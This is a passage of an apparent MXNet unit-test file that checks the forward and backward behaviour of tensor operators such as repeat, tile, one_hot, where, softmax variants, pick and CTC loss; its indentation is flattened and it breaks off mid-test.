test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
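# Equivalently, the expected gradient above can be computed without loops
# (illustrative sketch): for axis=0, npout_grad.reshape(n1, repeats, n2).sum(axis=1);
# for axis=1, npout_grad.reshape(n1, n2, repeats).sum(axis=2).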
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
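# A vectorized sketch of the same expected gradient: reshape the upstream gradient
# into its tiled blocks and sum them, e.g.
#
#     npout_grad.reshape(reps1, n1, reps2, n2).sum(axis=(0, 2))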
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
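# Compact numpy reference for the one-hot behaviour exercised above: out-of-range
# and negative indices produce all-zero rows, and depth=0 yields a trailing axis of
# size zero. Hypothetical helper, not used by the tests:
def _one_hot_reference(indices, depth, dtype=np.int32):
    indices = np.asarray(indices)
    return (np.arange(depth) == indices[..., None]).astype(dtype)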
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert same(expect_out, out)
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
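# Numpy sketch of the semantics checked above: a condition with the same shape as x
# selects element-wise, while a 1-D condition of length x.shape[0] selects whole rows.
# Hypothetical helper, not used by the tests:
def _where_reference(condition, x, y):
    cond = np.asarray(condition).astype(bool)
    if cond.shape != x.shape:
        # broadcast the per-row condition across the remaining axes
        cond = cond.reshape((-1,) + (1,) * (x.ndim - 1))
    return np.where(cond, x, y)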
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
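# The temperature variant above is assumed to follow the usual definition
# softmax(x, T) = exp(x / T) / sum(exp(x / T)). A minimal numpy sketch
# (not the implementation under test):
def _softmax_with_temperature_sketch(x, axis, temperature):
    z = x / temperature
    z = z - z.max(axis=axis, keepdims=True)  # shift for numerical stability
    e = np.exp(z)
    return e / e.sum(axis=axis, keepdims=True)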
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
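# The extreme magnitudes above only stay NaN-free if the implementation uses the
# standard max-subtraction trick; a naive float32 softmax overflows, e.g.
# (illustrative 1-D sketch, unrelated to the axis-1 reduction used in the test):
#
#     x = np.array([3.4e38, 3.4e38], dtype=np.float32)
#     np.exp(x) / np.exp(x).sum()                          # nan (inf / inf)
#     np.exp(x - x.max()) / np.exp(x - x.max()).sum()      # [0.5, 0.5]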
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# forward with grad calc (training mode)
exe.forward(is_train=True)
out_train = exe.outputs[0].copy()
# forward without grad calc (inference mode)
exe.forward(is_train=False)
out_eval = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(out_train, out_eval)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(out_train, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # reference values from TensorFlow
vocab_size = 5
max_label_len = 5
padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
